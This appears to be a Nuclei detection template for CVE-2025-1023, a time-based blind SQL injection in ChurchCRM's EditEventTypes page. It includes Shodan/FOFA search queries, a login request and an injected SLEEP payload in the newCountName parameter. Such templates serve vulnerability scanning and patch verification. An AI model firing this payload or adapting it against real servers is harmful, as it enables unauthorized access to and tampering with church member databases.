id: CVE-2025-1023

info:
  name: ChurchCRM - SQL Injection
  author: Kazgangap
  severity: critical
  description: |
    A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to execute arbitrary SQL queries by exploiting a time-based blind SQL Injection vulnerability in the EditEventTypes functionality. The newCountName parameter is directly concatenated into an SQL query without proper sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to data exfiltration, modification, or deletion.
  impact: |
    Authenticated attackers can execute arbitrary SQL queries through time-based blind SQL injection in ChurchCRM, leading to data exfiltration, modification, or deletion of church member information and potentially complete database compromise.
  remediation: |
    Upgrade to ChurchCRM version 5.13.1 or later, which addresses the SQL injection vulnerability.
  reference:
    - https://github.com/ChurchCRM/CRM/issues/7246
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-1023.md
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1023
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-1023
    cwe-id: CWE-89
    epss-score: 0.02752
    epss-percentile: 0.86271
    cpe: cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: churchcrm
    product: churchcrm
    shodan-query: http.title:"churchcrm"
    fofa-query: app="churchcrm"
  tags: cve,cve2025,authenticated,churchcrm,sqli,vkev

http:
  - raw:
      - |
        POST /session/begin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        User={{username}}&Password={{password}}

      - |
        @timeout 30s
        POST /EditEventTypes.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        EN_tyid=1&newEvtName=Test&newEvtStartTime=10:30:00&newCountName=1%27%20AND%20(SELECT%20SLEEP(8))%20AND%20%271%27%3D%271&Action=ADD

    matchers:
      - type: dsl
        dsl:
          - 'duration_2 >= 8'
          - 'status_code_2 == 500'
          - 'contains(body_2, "ChurchCRM: Edit Event Types")'
        condition: and
# digest: 4a0a00473045022100c684ff6500d4da1d2ae77a0777829f902b169f52b22794245c92283a0fb19a1a0220386a0e4ba39bd274dd6f4a7c5264ad38bd1af116979515b7b57e05494f7a7d81:922c64590222798bb761d5b6d8e72950